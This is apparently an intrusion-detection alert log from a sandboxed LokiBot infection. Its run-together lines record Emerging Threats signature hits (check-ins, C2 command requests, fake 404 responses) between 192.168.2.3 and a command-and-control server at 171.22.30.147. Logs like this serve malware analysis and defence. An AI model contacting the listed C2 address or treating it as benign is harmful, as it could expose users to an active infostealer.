              192.168.2.3171.22.30.14749986802024313 01/05/23-08:53:36.285692TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749773802021641 01/05/23-08:52:31.909319TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500392025483 01/05/23-08:53:51.948003TCP2025483ET TROJAN LokiBot Fake 404 Response8050039171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749821802024313 01/05/23-08:52:46.829983TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749841802025381 01/05/23-08:52:53.743125TCP2025381ET TROJAN LokiBot Checkin4984180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749844802021641 01/05/23-08:52:54.549139TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749988802025381 01/05/23-08:53:36.817903TCP2025381ET TROJAN LokiBot Checkin4998880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749775802025381 01/05/23-08:52:32.683406TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750059802021641 01/05/23-08:53:57.279795TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749821802024318 01/05/23-08:52:46.829983TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749939802021641 01/05/23-08:53:21.632432TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749999802825766 01/05/23-08:53:39.715844TCP2825766ETPRO TROJAN LokiBot Checkin M24999980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749887802024318 01/05/23-08:53:06.117016TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498082025483 01/05/23-08:52:43.407695TCP2025483ET TROJAN LokiBot Fake 404 Response8049808171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749887802024313 01/05/23-08:53:06.117016TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749703802024313 01/05/23-08:52:08.565296TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749859802024313 01/05/23-08:52:58.622571TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749756802025381 01/05/23-08:52:27.231494TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749868802024313 01/05/23-08:53:01.029018TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749806802825766 01/05/23-08:52:42.779655TCP2825766ETPRO TROJAN LokiBot Checkin M24980680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749720802825766 01/05/23-08:52:16.949813TCP2825766ETPRO TROJAN LokiBot Checkin M24972080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749802802024318 01/05/23-08:52:41.641382TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749860802025381 01/05/23-08:52:58.886735TCP2025381ET TROJAN LokiBot Checkin4986080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749872802021641 01/05/23-08:53:02.084337TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749958802021641 01/05/23-08:53:27.233105TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749758802825766 01/05/23-08:52:27.765970TCP2825766ETPRO TROJAN LokiBot Checkin M24975880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750040802021641 01/05/23-08:53:52.135869TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750081802825766 01/05/23-08:54:03.233046TCP2825766ETPRO TROJAN LokiBot Checkin M25008180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749832802025381 01/05/23-08:52:49.809310TCP2025381ET TROJAN LokiBot Checkin4983280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749859802024318 01/05/23-08:52:58.622571TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749997802025381 01/05/23-08:53:39.208772TCP2025381ET TROJAN LokiBot Checkin4999780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498492025483 01/05/23-08:52:55.968261TCP2025483ET TROJAN LokiBot Fake 404 Response8049849171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749830802024313 01/05/23-08:52:49.252221TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498272025483 01/05/23-08:52:48.539251TCP2025483ET TROJAN LokiBot Fake 404 Response8049827171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749961802825766 01/05/23-08:53:29.597138TCP2825766ETPRO TROJAN LokiBot Checkin M24996180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749784802025381 01/05/23-08:52:36.673037TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749830802024318 01/05/23-08:52:49.252221TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498382025483 01/05/23-08:52:52.903649TCP2025483ET TROJAN LokiBot Fake 404 Response8049838171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749970802825766 01/05/23-08:53:32.043326TCP2825766ETPRO TROJAN LokiBot Checkin M24997080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749971802021641 01/05/23-08:53:32.299331TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749953802021641 01/05/23-08:53:25.469204TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497202025483 01/05/23-08:52:17.036927TCP2025483ET TROJAN LokiBot Fake 404 Response8049720171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749925802021641 01/05/23-08:53:17.874226TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499432025483 01/05/23-08:53:22.801221TCP2025483ET TROJAN LokiBot Fake 404 Response8049943171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750078802024313 01/05/23-08:54:02.320663TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749920802021641 01/05/23-08:53:16.511672TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749942802825766 01/05/23-08:53:22.441601TCP2825766ETPRO TROJAN LokiBot Checkin M24994280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750028802025381 01/05/23-08:53:48.853917TCP2025381ET TROJAN LokiBot Checkin5002880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749981802021641 01/05/23-08:53:34.961120TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750078802024318 01/05/23-08:54:02.320663TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749802802021641 01/05/23-08:52:41.641382TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497152025483 01/05/23-08:52:14.109490TCP2025483ET TROJAN LokiBot Fake 404 Response8049715171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380497262025483 01/05/23-08:52:18.785455TCP2025483ET TROJAN LokiBot Fake 404 Response8049726171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749868802024318 01/05/23-08:53:01.029018TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498462025483 01/05/23-08:52:55.179194TCP2025483ET TROJAN LokiBot Fake 404 Response8049846171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380498572025483 01/05/23-08:52:58.138227TCP2025483ET TROJAN LokiBot Fake 404 Response8049857171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749915802021641 01/05/23-08:53:15.112176TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749986802021641 01/05/23-08:53:36.285692TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500662025483 01/05/23-08:53:59.180210TCP2025483ET TROJAN LokiBot Fake 404 Response8050066171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749728802025381 01/05/23-08:52:19.268418TCP2025381ET TROJAN LokiBot Checkin4972880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750056802025381 01/05/23-08:53:56.463023TCP2025381ET TROJAN LokiBot Checkin5005680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750038802025381 01/05/23-08:53:51.593310TCP2025381ET TROJAN LokiBot Checkin5003880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500552025483 01/05/23-08:53:56.268231TCP2025483ET TROJAN LokiBot Fake 404 Response8050055171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749896802024318 01/05/23-08:53:08.759564TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749740802024313 01/05/23-08:52:22.636691TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749799802025381 01/05/23-08:52:40.836883TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750051802025381 01/05/23-08:53:55.100340TCP2025381ET TROJAN LokiBot Checkin5005180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750066802025381 01/05/23-08:53:59.096230TCP2025381ET TROJAN LokiBot Checkin5006680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749948802021641 01/05/23-08:53:24.079081TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749896802024313 01/05/23-08:53:08.759564TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749740802024318 01/05/23-08:52:22.636691TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749976802021641 01/05/23-08:53:33.629058TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750023802025381 01/05/23-08:53:47.546596TCP2025381ET TROJAN LokiBot Checkin5002380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749711802825766 01/05/23-08:52:12.061796TCP2825766ETPRO TROJAN LokiBot Checkin M24971180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749867802825766 01/05/23-08:53:00.773467TCP2825766ETPRO TROJAN LokiBot Checkin M24986780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497312025483 01/05/23-08:52:20.190278TCP2025483ET TROJAN LokiBot Fake 404 Response8049731171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749958802024318 01/05/23-08:53:27.233105TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749738802025381 01/05/23-08:52:22.066688TCP2025381ET TROJAN LokiBot Checkin4973880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749972802024318 01/05/23-08:53:32.566966TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749943802021641 01/05/23-08:53:22.718924TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749790802825766 01/05/23-08:52:38.345416TCP2825766ETPRO TROJAN LokiBot Checkin M24979080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749958802024313 01/05/23-08:53:27.233105TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750011802825766 01/05/23-08:53:42.925761TCP2825766ETPRO TROJAN LokiBot Checkin M25001180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749712802024313 01/05/23-08:52:12.436257TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749712802024318 01/05/23-08:52:12.436257TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749972802024313 01/05/23-08:53:32.566966TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497862025483 01/05/23-08:52:37.298040TCP2025483ET TROJAN LokiBot Fake 404 Response8049786171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749817802024318 01/05/23-08:52:45.747633TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497972025483 01/05/23-08:52:40.343463TCP2025483ET TROJAN LokiBot Fake 404 Response8049797171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749817802024313 01/05/23-08:52:45.747633TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749830802021641 01/05/23-08:52:49.252221TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749812802024318 01/05/23-08:52:44.412618TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749895802825766 01/05/23-08:53:08.372653TCP2825766ETPRO TROJAN LokiBot Checkin M24989580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749766802025381 01/05/23-08:52:30.012463TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749901802024313 01/05/23-08:53:11.357263TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749812802024313 01/05/23-08:52:44.412618TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749968802024313 01/05/23-08:53:31.490288TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750045802021641 01/05/23-08:53:53.481872TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499652025483 01/05/23-08:53:30.756002TCP2025483ET TROJAN LokiBot Fake 404 Response8049965171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749962802024313 01/05/23-08:53:29.855666TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749865802025381 01/05/23-08:53:00.234414TCP2025381ET TROJAN LokiBot Checkin4986580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749873802024313 01/05/23-08:53:02.352866TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749873802024318 01/05/23-08:53:02.352866TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750035802825766 01/05/23-08:53:50.741604TCP2825766ETPRO TROJAN LokiBot Checkin M25003580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749770802025381 01/05/23-08:52:31.112136TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749936802025381 01/05/23-08:53:20.832811TCP2025381ET TROJAN LokiBot Checkin4993680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749716802825766 01/05/23-08:52:14.357533TCP2825766ETPRO TROJAN LokiBot Checkin M24971680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749908802025381 01/05/23-08:53:13.214132TCP2025381ET TROJAN LokiBot Checkin4990880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749962802024318 01/05/23-08:53:29.855666TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750007802825766 01/05/23-08:53:41.829015TCP2825766ETPRO TROJAN LokiBot Checkin M25000780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750073802021641 01/05/23-08:54:00.951462TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749934802024313 01/05/23-08:53:20.304475TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749734802825766 01/05/23-08:52:20.978367TCP2825766ETPRO TROJAN LokiBot Checkin M24973480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749845802024313 01/05/23-08:52:54.838950TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749996802024313 01/05/23-08:53:38.933239TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750061802025381 01/05/23-08:53:57.824423TCP2025381ET TROJAN LokiBot Checkin5006180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750017802021641 01/05/23-08:53:44.537455TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497422025483 01/05/23-08:52:23.269269TCP2025483ET TROJAN LokiBot Fake 404 Response8049742171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750001802825766 01/05/23-08:53:40.243949TCP2825766ETPRO TROJAN LokiBot Checkin M25000180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749996802024318 01/05/23-08:53:38.933239TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499212025483 01/05/23-08:53:16.873916TCP2025483ET TROJAN LokiBot Fake 404 Response8049921171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750068802825766 01/05/23-08:53:59.646284TCP2825766ETPRO TROJAN LokiBot Checkin M25006880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749911802024318 01/05/23-08:53:14.014731TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749839802825766 01/05/23-08:52:53.202583TCP2825766ETPRO TROJAN LokiBot Checkin M24983980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749845802024318 01/05/23-08:52:54.838950TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749721802021641 01/05/23-08:52:17.231128TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749934802024318 01/05/23-08:53:20.304475TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500772025483 01/05/23-08:54:02.148840TCP2025483ET TROJAN LokiBot Fake 404 Response8050077171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750035802021641 01/05/23-08:53:50.741604TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749964802025381 01/05/23-08:53:30.400374TCP2025381ET TROJAN LokiBot Checkin4996480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749744802825766 01/05/23-08:52:23.736699TCP2825766ETPRO TROJAN LokiBot Checkin M24974480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749849802021641 01/05/23-08:52:55.895226TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749891802024313 01/05/23-08:53:07.205477TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749893802025381 01/05/23-08:53:07.754435TCP2025381ET TROJAN LokiBot Checkin4989380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750033802025381 01/05/23-08:53:50.199257TCP2025381ET TROJAN LokiBot Checkin5003380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749762802825766 01/05/23-08:52:28.868227TCP2825766ETPRO TROJAN LokiBot Checkin M24976280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749891802024318 01/05/23-08:53:07.205477TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500442025483 01/05/23-08:53:53.305777TCP2025483ET TROJAN LokiBot Fake 404 Response8050044171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749968802024318 01/05/23-08:53:31.490288TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749778802021641 01/05/23-08:52:34.958959TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749835802024318 01/05/23-08:52:50.902278TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499762025483 01/05/23-08:53:33.709700TCP2025483ET TROJAN LokiBot Fake 404 Response8049976171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750005802025381 01/05/23-08:53:41.297546TCP2025381ET TROJAN LokiBot Checkin5000580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750007802021641 01/05/23-08:53:41.829015TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500332025483 01/05/23-08:53:50.284555TCP2025483ET TROJAN LokiBot Fake 404 Response8050033171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380499542025483 01/05/23-08:53:25.808050TCP2025483ET TROJAN LokiBot Fake 404 Response8049954171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749992802025381 01/05/23-08:53:37.885447TCP2025381ET TROJAN LokiBot Checkin4999280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749913802025381 01/05/23-08:53:14.593137TCP2025381ET TROJAN LokiBot Checkin4991380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749938802825766 01/05/23-08:53:21.374225TCP2825766ETPRO TROJAN LokiBot Checkin M24993880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749732802025381 01/05/23-08:52:20.401546TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749820802021641 01/05/23-08:52:46.558490TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749731802021641 01/05/23-08:52:20.113614TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749772802825766 01/05/23-08:52:31.644906TCP2825766ETPRO TROJAN LokiBot Checkin M24977280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749807802024313 01/05/23-08:52:43.044779TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499322025483 01/05/23-08:53:19.843053TCP2025483ET TROJAN LokiBot Fake 404 Response8049932171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749807802024318 01/05/23-08:52:43.044779TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749809802025381 01/05/23-08:52:43.596832TCP2025381ET TROJAN LokiBot Checkin4980980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749863802024318 01/05/23-08:52:59.703117TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749911802024313 01/05/23-08:53:14.014731TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749863802024313 01/05/23-08:52:59.703117TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749706802825766 01/05/23-08:52:09.771973TCP2825766ETPRO TROJAN LokiBot Checkin M24970680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749837802025381 01/05/23-08:52:51.988001TCP2025381ET TROJAN LokiBot Checkin4983780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749877802021641 01/05/23-08:53:03.433942TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497912025483 01/05/23-08:52:38.699631TCP2025483ET TROJAN LokiBot Fake 404 Response8049791171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749990802024313 01/05/23-08:53:37.383838TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749966802825766 01/05/23-08:53:30.946864TCP2825766ETPRO TROJAN LokiBot Checkin M24996680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749990802024318 01/05/23-08:53:37.383838TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750003802024313 01/05/23-08:53:40.763519TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749760802025381 01/05/23-08:52:28.304789TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497802025483 01/05/23-08:52:35.592230TCP2025483ET TROJAN LokiBot Fake 404 Response8049780171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750058802825766 01/05/23-08:53:57.002594TCP2825766ETPRO TROJAN LokiBot Checkin M25005880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749789802025381 01/05/23-08:52:38.076275TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749835802024313 01/05/23-08:52:50.902278TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749916802021641 01/05/23-08:53:15.372296TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750021802024318 01/05/23-08:53:46.361205TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749726802024313 01/05/23-08:52:18.702884TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498132025483 01/05/23-08:52:44.765886TCP2025483ET TROJAN LokiBot Fake 404 Response8049813171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749820802825766 01/05/23-08:52:46.558490TCP2825766ETPRO TROJAN LokiBot Checkin M24982080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750079802024318 01/05/23-08:54:02.588823TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750082802024313 01/05/23-08:54:03.532238TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749853802825766 01/05/23-08:52:56.960046TCP2825766ETPRO TROJAN LokiBot Checkin M24985380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750082802024318 01/05/23-08:54:03.532238TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498912025483 01/05/23-08:53:07.291807TCP2025483ET TROJAN LokiBot Fake 404 Response8049891171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749952802021641 01/05/23-08:53:25.200806TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749949802021641 01/05/23-08:53:24.361661TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994980192.168.2.3171.22.30.147
